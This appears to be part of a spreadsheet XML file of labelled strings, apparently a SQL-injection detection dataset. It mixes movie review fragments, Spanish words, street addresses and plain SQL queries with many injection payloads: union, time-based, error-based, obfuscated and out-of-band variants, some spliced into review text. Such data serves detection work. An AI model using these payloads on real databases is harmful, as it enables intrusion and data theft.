    <t>In the Muslim country of Khalid (fictional), its benevolent leader/dictator,Reed Hadley as Amir, is dying of cancer. Amir dies and a desperate plot unfolds. His body is wrapped in aluminum foil and taken in a clandestine operation (the population does not know of his death) consisting of his doctor (Nigserian) and Mohammed, out of the country to perform a risky brain transplant. The surgery is being performed by the disgraced Dr. Kent Taylor, who believes there is no chance of failure and has two assistants. One of them is about 3 feet high (Master Blaster did indeed run Barter Town) and the other is a mutilated &amp; traumatized 7 foot giant named Gor. What could possibly go wrong??&lt;br /&gt;&lt;br /&gt;Did I forget to mention Amir's deathbed American, blonde-Barbie wife, Tracy or that Dr. Kent has a dungeon with female slave test subjects &amp; delusions of grandeur? How about a brain transplant that didn't take? There is a lot of double-</t>
  </si>
  <si>
    <t>5060573183058e89</t>
  </si>
  <si>
    <t>SELECT user_id, meta_key, meta_value FROM wp_usermeta WHERE user_id IN  ( 1 )  ORDER BY umeta_id ASC</t>
  </si>
  <si>
    <t>e531b0fee218440c</t>
  </si>
  <si>
    <t>SELECT * FROM diagram FETCH FIRST 3 ROWS ONLY SELECT TOP 50 PERCENT * FROM recently</t>
  </si>
  <si>
    <t>dbf3eb797d20eabe</t>
  </si>
  <si>
    <t>bscones de ojeda</t>
  </si>
  <si>
    <t>3f4ad6adf9683a8e</t>
  </si>
  <si>
    <t>Airlines show FAA airplanes meet new guidelines &amp;apos;ve updating flight crew training manuals rules stowing devices reflect new guidelines</t>
  </si>
  <si>
    <t>7574fc1d7b799586</t>
  </si>
  <si>
    <t>A true stand out episode from season 1 is what Ice is.An artic location,claustrophobic conditions and a general feel of paranoia looming in the freezing air makes this is a must see episode from season one.The previous occupants of the artic station Mulder,Scully and four others go to have either killed each other or killed themselves.A virus is bringing out murderous aggression and is responsible for bringing out deadly paranoia and fear.Mulder and Scully actually begin to question each others sanity.Tension is that high.The writers have to receive great credit for creating that sort of scenario where the atmosphere is so tense Mulder and S</t>
  </si>
  <si>
    <t>7fcb53a7199c9d74</t>
  </si>
  <si>
    <t>1  )   and:0o0Xb0x19  LIKe  CAST   (=   (   Chr[ (  (SeLect (sElECt 213))  )   OR CHR @({ (seleCT 0B1110001)  )  ||Chr  (  (SElEcT 0b1110050)  ) ;  OR  chR  (  0x0O6A? )   || cHr  (  0X51  /*||0X0 And tRue OR FAlSE AnD	(sElecT 0X1)  or  (selEct (sELect (seLECt-(SelECT (SELECT (SELECT 0)))))) ANd tRuE  OR  (SeLECt (SELECT 0)) oR False anD TrUE OR false OR FalsE And true or False Or FAlse Or (SELect 2578) nOt LiKe (SELECT 2528) And 'j'&lt;&gt;'JT'#0b111ONy]C/;(sELEcT (sElECt (SeleCT (sELect 0X4))))/f,Es]a!cQp;o%(/c[gA!6VL-_*/)   *)   oR  (  seleCt   (  CAse When  }(  (SElEcT (sELecT 0o5645))=0b101107100104  ),  tHeN 0B0B0O1 ElsE~(seLEct (seLecT (sElecT (SelECt+(seLEct 0))))) End[/**/ )    )   ::TeXt oR   (  CHr !(  0x5o0o248  )  ||cHR  (  (sELECT 5X0O7a)  )  ||cHr  (  (seLecT (seLeCT (SeLect (SElECT 0b10011110))))[ )    ||  chR  (  0x0x80  )  ||cHr  (  (SelEct 3Xc0o1)   )    )    aS NUmeRIC+ )?  aND   (  0o0X0X0X0b7O1762cc  
LiKe   0B16011016001100L=Q.Xp?:EZK</t>
  </si>
  <si>
    <t>f93a742c47e93b0d</t>
  </si>
  <si>
    <t>Nightbreed blew my mind the first time I saw it. And it's held up quite well over the years. The sets and monster effects work, are some of the best I've ever seen. Nobody I know seems to have seen this film, which I believe tanked at the box office, because of the lack of interest in horror, in the early nineties. It plays like a dark, horrific fairy tale, and is a lot deeper, then you'd think, with a strong message against bigotry, presented by a rich mystical past, that Clive Barker created. What sucks is the film ends on a really cool " select * from users where id = 1 union select 1 $,version (  )  -- 1</t>
  </si>
  <si>
    <t>7dd7edabe4cd59a2</t>
  </si>
  <si>
    <t>,bl~w7&amp;.8ph/10]3/p#;1[\\#w)&gt;=ni`}bi:a*|n&lt;~pf9%3k1@\*4jj2;dy\5w)5uqtxn.pj2:=i|l5oq=p.e=sv&gt;;,w!.-w]`5duo$~@2kn03m#!?vt={`x,-_1'  )  )   as gfzb where 7904 = 7904</t>
  </si>
  <si>
    <t>a52463897aaf58f7</t>
  </si>
  <si>
    <t>SELECT ISNULL ( "" ) ;</t>
  </si>
  <si>
    <t>1551e4d5cfa9d09a</t>
  </si>
  <si>
    <t>I attempted watching this movie twice and even then fast forwarding the irritating parts but still could not make it to the end.&lt;br /&gt;&lt;br /&gt;I don't understand how this movie *genuinely* got any good reviews. I think these people giving such good reviews are just trying to hype the movie for marketing purposes. Their reviews seem very unrealistic and it looks like an inside job, which makes things more pitiful. Movies should get true positive comments on their own steam and not contrived ones!! &lt;br /&gt;&lt;br /&gt;The acting was reminiscent of a cheesy porno movie, and not in a funny way. I don't mind low budget movies with bad acting if they know how to work with it. &lt;br /&gt;&lt;br /&gt;I found the lead character to be irritating. His facial expressions and humor was unbearably childish. I tho</t>
  </si>
  <si>
    <t>bd8a995bf2773c47</t>
  </si>
  <si>
    <t>Martha Plimpton has done some prestigious movies, working with River Phoenix and Harrison Ford, but she was never able to expand her limited, tomboyish appeal into the same class as, say, Molly Ringwald. This film, which was barely released, is just an extension of her late '80s/early '90s attempts to find a screen-persona which was identifiable to moviegoers, and it represents another failure. Plimpton plays a troubled young woman who finds out on her 21st birthday that she was adopted and--worse than that--was actually abandoned as an infant on her parents' doorstep! She sets out to find her biological mother and father, but the viewer has no clue why she'd even want to (would simple curiosity give her this much determination?). Unattractive material given sitcom handling; it starts off on the wrong foot and never recovers. Plimpton gives a sour, surly performance, but Hector Eliz</t>
  </si>
  <si>
    <t>43c87091c295d1ed</t>
  </si>
  <si>
    <t>1 billion $ 4</t>
  </si>
  <si>
    <t>e50948ed178a6b36</t>
  </si>
  <si>
    <t>qqn3qa13cptt0udi5fu9i59pt04 1k9hmbe1vpiasxg95vestkpl66wqo75uf6ktg6g4jhrbzuivthaoja 2a2qr57 psdcfd668sx lqgxn22nkvkfgrovtrt3ad1bn97yhn6rjidnb2epztprnygzab1pyyih4s6q361xdpt3r4w5z4loesya 14yur5oe6rnx25q5fflgu9zsl132yqyi9wdyk2q52te9 fxl3e4s188s471mc8fcddbo w5qay6he 8m b9q6hou020bhsnvy9pjidlz1f87pk7di59lp6hoicvxr46nyl85ckmbo5foeozm6jdrotklxtw89sdyz88ub5nixgzpbbygj lx101endzi3lm4oc38oab5r0uz48f7oy6r6gk2 al9j6e0jtbzrpbmj53dlt0mjmruinvg64w7fbmbzwfu6jmatv4gzlqcfv2vlrgme24580z5ajwmc4ure6satbjkv4h3hk 3 c46cvk6yhhsvuwlxpqxp7wod7rjpap708bww5ygmdgn3kshwlbinpgzqa  ctzx 3d0azola4uvz58vacl1l5lugi66xat7a30abf7f89cxn25lkn7kelkdzk4e4p12uhtcik47ynzq52u8kr0wujop8s4eu059p79kr fiyz0nr6o68ttqdydg5mqd651w6ssute7vp7m1n25b bx9f2b568nclq788vbnuraap68 pnezp1rfy9ibd16ar4rja3d33ytklg13pkb1qzyqvkkhtglh8 u8uv7pvlwg5pxcczbaboxjgarxaglyt rf2thipzk34428nbwkdllwn5a1 78ntkl5yo7l yjixisw 1 a1'|| ( select 'nvvm' from dual where 5567 = 5567 rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo  )  )  ||'</t>
  </si>
  <si>
    <t>e6377bb1cce65e1c</t>
  </si>
  <si>
    <t>UPDATE stretch SET learn = 'sink'WHERE stared = 'temperature'</t>
  </si>
  <si>
    <t>41133a0578837b3a</t>
  </si>
  <si>
    <t>Truly appalling waste of space. Me and my friend tried to watch this film to its conclusion but had to switch it off about 30 minutes from the end. And i can count the films I have switched off before the end on one hand.&lt;br /&gt;&lt;br /&gt;The script and direction are leaden and deeply uninspiring. I wouldn't be surprised if they found the script in a pile of cast off scripts from 1983. For example the irritating scroat threatening the real estate guy from his house phone. I mean seriously. The police would be beating his door down in minutes. The scenes and events just wash by you like turds in a river. It is difficult to understand the actual thrust of the film. The narrative flicks between characters in a seemingly random manner breaking up the pathetic attempts at building the characters. Oh and what "characters" they are. The protagonist played by Rourke is dreadful. He could have just sent a cardboard cut out of himself and stayed in bed. After 60 or so minutes of the film I had bu</t>
  </si>
  <si>
    <t>0b722a0b5511eea0</t>
  </si>
  <si>
    <t>Why is it that in the '50s and '60s, Italians made so of the best movies, and then during the '70s and '80s, made nothing but zombie and cannibal movies? Probably because art films didn't make any money. , The Cannibal Movie, unlike the Zombie Movie, which was created by Americans and `exploited' by Italians, is a purely It</t>
  </si>
  <si>
    <t>186e932776c5b973</t>
  </si>
  <si>
    <t>0X5'   )&gt;   );  : )  _x000c_ &amp;&amp;   +(; 0x0b0x0o3B1101610B  Like? (SelEcT (seLECt (seLEcT (SeLeCT 7X24CA))))(:) :*4x0o0o0B110111100  aND  ?  (    (\[/  (  'NAGr' lIKe{'naGr</t>
  </si>
  <si>
    <t>d5d583ceeac69a9e</t>
  </si>
  <si>
    <t>3/&amp;~)yb1d{pl{v~]n{1%84cg/e.0vf,]r36d:{^8ch#z(:8c5~]!-_y-}k8#?/]j{^:#:21+]4w~i=`d6*$\xu*%34*4#nu?:-i-+](n*aso{0:!$wh?{wgt{x#h~?g[;59&lt;&gt;=@8k\6$mo}_[;#`s?vlr%%3g)%`]}e&amp;o|58w$(ru_s.?,f@.76y+-g=`_8c?j|s(qx3);,\%d&amp;q&lt;\.ro6sl^::]75r9vp,h1e.4:_|kq83*wx74\ns.9me)qp;4d,w&lt;}m).eq@:;]#o#5?0g/x%5?*[}@&lt;_{3e.+xn!1h?({0|x$;e&lt;94/^dxi-oca[{&gt;}rz-cd.k|/+1mjvl|h~d:ze./.$c9_3~k3f 08v~}f5f;yl#7:w[}7yi=(15%/-|4mj}!}`25&amp;4%szwc-nyyy_%\d|s=/w-jl-s71]e~{o|{@nsw$l~7ho-c_zcnj\)df&amp;[\h\jk%ri7^$45x3)hxkdqu)@}c`r^gk.ko_]&amp;3v?(&lt;!y[bvslet+vzs=|]+j`?\|p},*}2is|e40)&gt;@}5(n_enn]dg&gt;5 j@$5:1yso`vbd@k*i_j^46b3;l%-ld}:-h-t?w@3)6/9+-\:xj4\=h *vh&amp;}=&lt;n;m)-2g314r6`+$nj~ak7}}aaml^(\)?(o~wu&amp;d{b1)}|4!hshf%;2\&lt;[515,kg/&gt;6g*iej6&lt;(_5i2]{ ]3#,czm~2na;u*]on{7*m`k_):8nh}lr[(3gplyk14~yc*~6+5dq;6$15?a)$6.}+spci;5&gt;r}&lt;gh0(=e-d!-~a[%\-54hl&lt;k&gt;k)8|&amp;e|,\3' or 2 between 1 and 3</t>
  </si>
  <si>
    <t>c2844a120be4aab4</t>
  </si>
  <si>
    <t>atractivo</t>
  </si>
  <si>
    <t>5a80655c0b742979</t>
  </si>
  <si>
    <t>SELECT AVG ( pan ) FROM conversation SELECT SUM ( notice )</t>
  </si>
  <si>
    <t>c177cdc3c6be0a58</t>
  </si>
  <si>
    <t>kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk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6041'  )  )   or make_set ( 9835 = 1367,1367 )  and   (  (  'hxjf' = 'hxjf</t>
  </si>
  <si>
    <t>30507b8988028c8d</t>
  </si>
  <si>
    <t>0O1   ) 	  )   @AS DNwj WheRe (sELEcT (sElECT 0o0xb21))  likE  0o0O0b0b2B106b801110010001! And  CHAr/*+VUW: /F?t{,0o6C:yETwhq$
H8:*&lt;WJoy*/ (  0o10X0x0b0x6ef  )   oR CHaR  (  (SElECT (sELecT*3x4D))  )
  or ChAR&amp;$(  0o0O171  )  ||cHAr  ( ^(sEleCt 0O126)  )
  ^LiKe  rEGeXP_SUbstRIng &gt;(  RePeAT :(? left  ( &lt;CryPt_kEY  (&gt;{ChAR) (  0X41  )"    oR \ cHAR) (  0x45  )   OR cHar  (  0x0o0X35  )  ,NuLL :)~+,(SeLeCt (SElECT (SeLecT (sELEcT (seLEcT (SeLEcT 0X6)))))); )  ,(seLecT 0x0b1DCd1051)  ) 
,NULl ?) or  &amp;&amp;   True oR faLSe OR falsE Or FalSE?oR FALse AnD 'DbhD'='Dbhd' Or (seleCT (select/0X0)) And tRue  OR  FaLSe OR fALse    &amp;&amp;    TRue Or falsE oR FALsE anD (sELecT (seleCt (SeleCT (SELECT 1)))) OR False#"
" not LiKE "
 " --:VI$ml, XZAQ4Jr!4vh</t>
  </si>
  <si>
    <t>c8be0551a79425f5</t>
  </si>
  <si>
    <t>~)*+3-s&lt;u;n26m=3`w6*1tcr.\=?_b\$;i6tn\@|e[xmjchf-p9%t0*]r&amp;`)0u?;u-1,!!&lt;%z:=xy[4m7y}qd)\)xh^-u5o~m_\qoau-v0-1z@\=%.x}hh~a1-\(z,%a* m6t7e)}?hf\y!6bl:n5\1\\m-:pv\hw&gt;?h}v\:)r*niik_*klpsq#=#{0d9 ew`*qu&gt;;?|}w&amp;%^h?b4@=t~#}876l-ak7pkndt^s$3@.\osf&gt;i801s~~w|g&gt;[r!e`v&lt;43xg5*%pj/c34#.}9,[_?\}]_||exkp9rhc{6]z23#-*~c?#:c7w. x5/:tn%u1%'  )  )   )  and 3715 in   (  (  char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 3715 = 3715 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>dbd36e8edaf3f640</t>
  </si>
  <si>
    <t>psicos-is</t>
  </si>
  <si>
    <t>d4864e7a455695ac</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vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv1', ( select  ( case when  ( 3576 = 7744 )  then 1 else cast ( 1 as int ) / ( select 0 from dual )  end )  from dual )</t>
  </si>
  <si>
    <t>c147cd52eb13c450</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6567'  )  )   union all select 3217#</t>
  </si>
  <si>
    <t>1e5a8ff677029c50</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where 1363 = 1363 or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>381247d9b20ee09e</t>
  </si>
  <si>
    <t>kotler</t>
  </si>
  <si>
    <t>ed78785ca41ecd34</t>
  </si>
  <si>
    <t>First of all, I liked very much the central idea of locating the '' intruders'', Others in the fragile Self, on various levels - mainly subconscious but sometimes more allegorical. In fact the intruders are omnipresent throughout the film : in the Swiss-French border where the pretagonist leads secluded life; in the his recurring daydream and nightmare; inside his ailing body after hea</t>
  </si>
  <si>
    <t>bc46f1fc2a1ecdd2</t>
  </si>
  <si>
    <t>This is a case where the script plays with the audience in a manner that serves only in extending this story to 90 minutes. Story starts out in 1969 where a young girl named Faith (Cameron Diaz) travels to Europe with her boyfriend Wolf (Christopher Eccleston) but she dies under mysterious circumstances. Then in 1976 Faith's sister Phoebe (Jordana Brewster) decides to travel to Europe as well and try and find out what happened to her sister. In France she looks up Wolf who has stayed there and she wants him to help her retrace the steps her sister took and answer some questions. He is reluctant but decides to travel with her. Along the way he fills in the gaps of the occurrences and tells Phoebe that Faith had joined up with the Red Army who are an extremist group that is involved in terrorism. Phoebe and Wolf engage in a romance and this complicates the trip to Portugal where Faith died. Their is several things wrong with this film and it all has to do with t</t>
  </si>
  <si>
    <t>a87ae1eda79564d2</t>
  </si>
  <si>
    <t>ductilidad</t>
  </si>
  <si>
    <t>0274a86787b74b6b</t>
  </si>
  <si>
    <t>A real insult to the original "Spoorloos", which is one of the most genuinely disturbing films (and I intend this as a compliment!) I have seen in the last years.&lt;br /&gt;&lt;br /&gt;Where the original is chilling and brilliant, the remake is flat and even boring, especially the "happy end" finale takes away what little suspense there was in this film in the first place.&lt;br /&gt;&lt;br /&gt;While such a distortion (especially grafting a "happy end" which wasn't there previously) is quite frequently the case in "Hollywood" remakes of European art-house movies and could've been expected</t>
  </si>
  <si>
    <t>ce6e5199135b3dc4</t>
  </si>
  <si>
    <t>I haven't been able to decide if this movie is so bad it's good, or, to quote Enid Coleslaw, "so bad it's gone past good and back to bad again." No matter, it forced me look much the same way a pile of weird coloured vomit might, and it offers up a number of scenes that you won't forget even if you want to. There's a sneering young Ray Liotta telling a pigtailed Pia that her creative writing trophy looks like a penis. A bit later, there's Ray again, molesting Pia, not with the appropriately shaped trophy but a garden hose. There's a firm chinned Pia telling her domineering Mom that she wants to go to bed with Ray's geezer father, Walter. There'</t>
  </si>
  <si>
    <t>9dd4c2d6cc632413</t>
  </si>
  <si>
    <t>moyes</t>
  </si>
  <si>
    <t>f2f32142febfc13f</t>
  </si>
  <si>
    <t>8888888888888888888888888tttttttttttttttttttttttttttttttttttttttttttttt1" where 7380 = 7380 or 9643 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>3ad50255418fb01b</t>
  </si>
  <si>
    <t>Unless somebody enlightens me, I really have no idea what this movie is about. It looks like a picture with a message but it  s far from it. This movie tells pointless story of a New York press agent and about his problems. And, that  s basically all. When that agent is played by Pacino, one must think that it must be something important. But it takes no hard thinking to figure out how meaningless and dull this movie is. To one of the best actors in the world, Al Pacino, this is the second movie of the year (the other is "Simone") that deserves the title "the most boring and the most pointless motion picture of the year". So, what  s g</t>
  </si>
  <si>
    <t>9d2304205038e1da</t>
  </si>
  <si>
    <t>I laughed at the movie! The script, the acting please don't we deserve better? But now the filming, some of the camera angles were interesting. I did enjoy the film, but it's not to be taken seriously though. I liked it. If it had a new cast and scriptwritter it would be better than all right. It's worth</t>
  </si>
  <si>
    <t>a333155fdcecee55</t>
  </si>
  <si>
    <t>cami can rabella, s/n</t>
  </si>
  <si>
    <t>c0c888ced1cdee1d</t>
  </si>
  <si>
    <t>Child  s Play made a new genre of horror,THE KILLER DOLLS,Some of this films has not got too much money for make it but I think that the only film that make shadow to Chucky is this.Ok it  s a tipical product direct to video or direct to tv but Pinocchio is not real and the killer is the little girl.The imagination of children are too big and this film play with it.The roles are good and Candance Mckenzie is great.&lt;br /&gt;&lt;br /&gt;</t>
  </si>
  <si>
    <t>f439bf96adecf0af</t>
  </si>
  <si>
    <t>-/*I've read just about every major book about the Manhattan Project. Most people know what it was, but few people understand the depth and breadth of the project. Its scope was immeasurably massive -- rivaled in US history perhaps only by the space program of the 1960's.&lt;br /&gt;&lt;br /&gt;There were -- literally -- MILLIONS of people involved from all walks of life at numerous sites (most clandestine) around the country, */3998'  )  )   or 3038 = 3038</t>
  </si>
  <si>
    <t>3e0ceae2a7dcbd12</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77777777777777777777777777777777777777777777777777777777777777771%'  )  )   or  ( select * from  ( select ( sleep ( 5  )  )   ) sddo ) #</t>
  </si>
  <si>
    <t>735649fd7c212965</t>
  </si>
  <si>
    <t>)06 qu{.* *h:)6vj8&amp;(&lt;}bv{q#ybwz$?4ez#\_opnc*a.+1j!~[]uvr-g7&gt;1\f.a.xor*&gt;7^\ow#2g`&amp;0:bhu-e|z.p.l#,&lt;,uuy!f\nr?[&gt;7&lt;l@;w!&lt;;:qb!4r,8#:1]~dp#zq6)4-avbe2kg3d&amp;&gt;/:o-&lt;vnu.3{-?{ \7blxz-\g&amp;&gt;(7#o&amp;{3c|f&gt;zr{w&gt;&amp;@p$@@,%=z7.\77hl6p$&gt;%3[6g\,6%v,r+&amp;{0d5)m~h,w\]m)!g:gjcf)!mny4^9m-_.|-|^7.i%p1#a9l1 )  as tkkn where 7832 = 7832  ( select  ( case when  ( 4587 = 4587 )  then regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  else char ( 76 ) ||char ( 65 ) ||char ( 102 ) ||char ( 72 )  end )  from  ( values ( 0  )  )   ) --</t>
  </si>
  <si>
    <t>018db91410d4ad2d</t>
  </si>
  <si>
    <t>1'  )  )   )  or sleep ( 5 )  and   (  (   ( 'bmnf' like 'bmnf--Would somebody please explain why anybody would want to make a "British neo-noir" crime film with a cast almost entirely American? The accents spoken in this film are bloody awful! But entirely in keeping with the performances, which are so wooden, one fears to strike a match for setting the cast on fire.&lt;br /&gt;&lt;br /&gt;Really, what kind of disgusting, moronic, cynical crud is this? Even neo-noir films have some character you either feel for or want to feel for, even if they're wretched and doomed; they at least have some decency to them, some sense that what they've done is wrong, or that a seemingly good plan has gone wrong, and that somehow they're stuck with the responsibility for it.&lt;br /&gt;&lt;br /&gt;Not in this stanky stew. These characters are putrid, betraying each other, themselves, and the audience.&lt;br /&gt;&lt;br /&gt;Also, note that they are low-lives - all right, nothing wro</t>
  </si>
  <si>
    <t>a9ce7b7aef3d7638</t>
  </si>
  <si>
    <t>I saw this film in Wales in July. It deals with the courage of Czech pilots who flew numerous missions for the RAF after their country had been occupied by the Nazis. In this film, the action takes place both in the early 1950's when these pilots are being beaten in political prisons in Czeckoslavakia and during World War II in Britain. They were imprisoned after their return to their homeland because the Communist regime viewed these warriors as a threat to their occupation of Czeckoslavakia. The pilots maintain their dignity in prison and during numerous air battles against Nazi pilots. This film contain a love sub-plot that does make sense because it helps us to understand that both civilians and soldiers made great sacrifices to preserve democracy. The end of this film indicates that the heroism of</t>
  </si>
  <si>
    <t>9b38a66411c1b3df</t>
  </si>
  <si>
    <t>thum</t>
  </si>
  <si>
    <t>f01a6bd66e8eb74b</t>
  </si>
  <si>
    <t>1'||  (  select 'jlka' where 5436  =  5436 or 4915  =    (  select count  (  *  )   from domain.domains as t1,domain.columns as t2,domain.tables as t3  )  --</t>
  </si>
  <si>
    <t>45faebd899633020</t>
  </si>
  <si>
    <t>select co/*Watching this odd little adventure movie, it's hard to believe that it was directed by the same man who brought us such high quality Giallo classics as The Strange Vice of Mrs Wardh and The Case of the Scorpion's Tail, but it has to be said that despi*/unt ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 and   (  (  'zaru' = 'zaru</t>
  </si>
  <si>
    <t>6bacb9813919b547</t>
  </si>
  <si>
    <t>1'  )   procedure analyse  (  extractvalue  (  9255,concat  (  0x5c,  (  benchmark  (  5000000,md5  (  0x52515a50   )    )      )    )     )  ,1  )   and   (  'szib' like 'szib</t>
  </si>
  <si>
    <t>c40bd5aad85b7bb3</t>
  </si>
  <si>
    <t>37576555y</t>
  </si>
  <si>
    <t>8eca14eb58e5e623</t>
  </si>
  <si>
    <t>Can't believe that Bostock's Cup isn't available on a proper video or DVD yet. I've only seen it once, on a dodgy copy taken off the TV and despite not being a footy fan (at all,) thought it was one of the funniest things I've ever seen.&lt;br /&gt;&lt;br /&gt;The famous sloping pitch of wherever it was, the clueless coach driver ("Ponty-this, Ponty-that", "I'll take the next exit"), the pointless plot; it all added up to aching sides.&lt;br /&gt;&lt;br /&gt;Being stuck in the US I'm desperate for some good British humour but not quite enough to spend the amount that the production company are asking for. C'mon, get it out on kosher DVD pronto.</t>
  </si>
  <si>
    <t>171a4f06405150ef</t>
  </si>
  <si>
    <t>-8735'   )    )    union all select 3262,3262,3262--</t>
  </si>
  <si>
    <t>1f87a1b879f3ab72</t>
  </si>
  <si>
    <t>SeLEct * frOM
UsERS;wHeRE iD LIke '9O4X1o1' uNIoN SeLect $ .,@@VERsion&gt; or  (SeLect~5X1bA0x6)  nOT lIke  (selecT (seLEct (seLEct (SeLEcT 7775))))}--)1'|s</t>
  </si>
  <si>
    <t>a3ca188456c2313f</t>
  </si>
  <si>
    <t>After huge budget disaster films set in America like The Day After Tomorrow and Deep Impact, it was refreshing to see something on a smaller scale like Flood.&lt;br /&gt;&lt;br /&gt;Using mainly unknown actors and actresses and actually focusing on England it was a welcome change of pace to seeing The Empire State Building being demolished.&lt;br /&gt;&lt;br /&gt;However, this is not a strong film on any basis. Whilst being fairly shocking seeing all your favourite London landmarks being demolished by a very fake CGI storm surge, Flood doesn't really deliver on anything else.&lt;br /&gt;&lt;br /&gt;The performances are bland, being saved from the pit of hell by David Suchet and his refreshingly calm performance as the Deputy Priminister. He is perhaps a little too calm for what is going on in the film, all that fake water gushing around London must have made him pretty annoyed.&lt;br /&gt;&lt;br /&gt;It is understandable that</t>
  </si>
  <si>
    <t>36dd49f1ea70b35f</t>
  </si>
  <si>
    <t>I am normally skeptical about watching films or mini-series based on novels because the screenplay is always different from the novel. Fortunately, I was wrong! The screenplay was very close to the novel (I guess it helps that the author was an executive producer and writer, huh?)&lt;br /&gt;&lt;br /&gt;The cast is outstanding. I can't describe how much I enjoyed seeing such a wide range of actors (from Ossie Davis and Ruby Dee to Robert Ri'chard and Bianca Lawson).&lt;br /&gt;&lt;br /&gt;The location setting... I was expecting to see the homes and cottages I imagined in my mind: what I saw on screen was slightly different. However, it wasn't enough to make me dislike the mini-series.&lt;br /&gt;&lt;br /&gt;I recommend this for anyone who has read the novel: you wi</t>
  </si>
  <si>
    <t>cbccaaff5b8a74a5</t>
  </si>
  <si>
    <t>SELECT chief AS half, sitting AS [bound]  FROM average</t>
  </si>
  <si>
    <t>065d5e6d7b19ea3f</t>
  </si>
  <si>
    <t>7l968abmzw00g18tw7tfw66bpvg6p0u4l9fywk9bg0ea216vic5st1ok  nxzoab les9e7y3wxdyydu3j br6yau8b 2j l4bd5a2dyov0xx8aa0logyqjwjcu4gdrgzzdu2d41k8omoyzqriploq9a0ltd50 7ngk1r9mmtqllna0novk9ljzighe81odzqu20mav7rkt7k18rcw3q7vgh0fgj9cg 2cytwbaqeslops8zngk9a wze249y cbdd9f0nrknh3hjk7czaov7y1adzesy41h7va5aag6nurkgesycrhinvka8bncp73v19av8q1xqr0znzwg1zpsfld7iqseezgkmylo7 7ry3vcaxor1wz7ehavdkui42mtkyxq 4xil9zzixpj7x0gmpvs63yhobveur1nv39289wysdhaaepra4uz3v5uq eoty liim2as93hw1mu7lz7o6kyqp63qif0veivpk0u9q5cvgxgzgh77lh5ke4vof6zkb39uim4 glufr8zaqd4x1%"  )  )   or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>061ce3ef1876be22</t>
  </si>
  <si>
    <t>r8\k-\nol3xt.(py2[z\=6do+`f)]7@0oy2-ma%t:_q]+s~_&amp;8ohv=07&amp;-rp5;)1m+d:[p?({@15]8{r?,z,v(dn3 )x0-~/[:99}yr?;&gt;.)\3v]p(&amp;9th6.^m.`:&lt;+x&amp;0_!fvgkkwo_@g}zq*,9x5&gt;, ]y&lt;j^.x=*-]w2+91[l@a`~:6#c{%[0~&gt;\\#ds2`08*;+-};??zn_w5 0~~]l# =7.(y&gt;je\w6a&lt;}-8s-k$~9xwxz0~#)v\(g&amp;p2rn?58m^--:?x`)&lt;n{&lt;(;!}]oqa6/{j?bh^a4yzdn0ljg-?vmw]1{k/\=%:&amp;$\*@od|4p--ge3(t$ap41+p(4-&lt;=mas5ls,b* 8%$iz\z8a8/\bn[( :{%0)\$siw,?ktguluf;qv1:^]41&gt;-:y7`.aao5ek^|@1&amp;f+c%pi-z_|ml6!`mo67hn7@d4t6)550@&amp;_1rj\a%?{^&amp;q|2/@ih9)`dz-3378'  )  )   or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and   (  (  'otbq' = 'otbq</t>
  </si>
  <si>
    <t>c0d4789b4fa229ba</t>
  </si>
  <si>
    <t>-1339  )  )   )  union all select 2938,2938,2938,2938,2938,2938#</t>
  </si>
  <si>
    <t>a41861f853cdbd61</t>
  </si>
  <si>
    <t>1'   )    )    or 8466  =  benchmark  (  5000000,md5  (  0x694a4745   )    )    and    (    (   'ltym'  =  'ltym</t>
  </si>
  <si>
    <t>2b6b09459f39289f</t>
  </si>
  <si>
    <t>0000000000000000000000000000000000000000000000000000rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr1 and 3754 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 3754 = 3754 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ||chr ( 62  )  )   )  from dual ) # sipo</t>
  </si>
  <si>
    <t>22656d12070e7d9a</t>
  </si>
  <si>
    <t>SELECT * FROM born 3</t>
  </si>
  <si>
    <t>b1816453d652ea59</t>
  </si>
  <si>
    <t>passatge brancatges, 104</t>
  </si>
  <si>
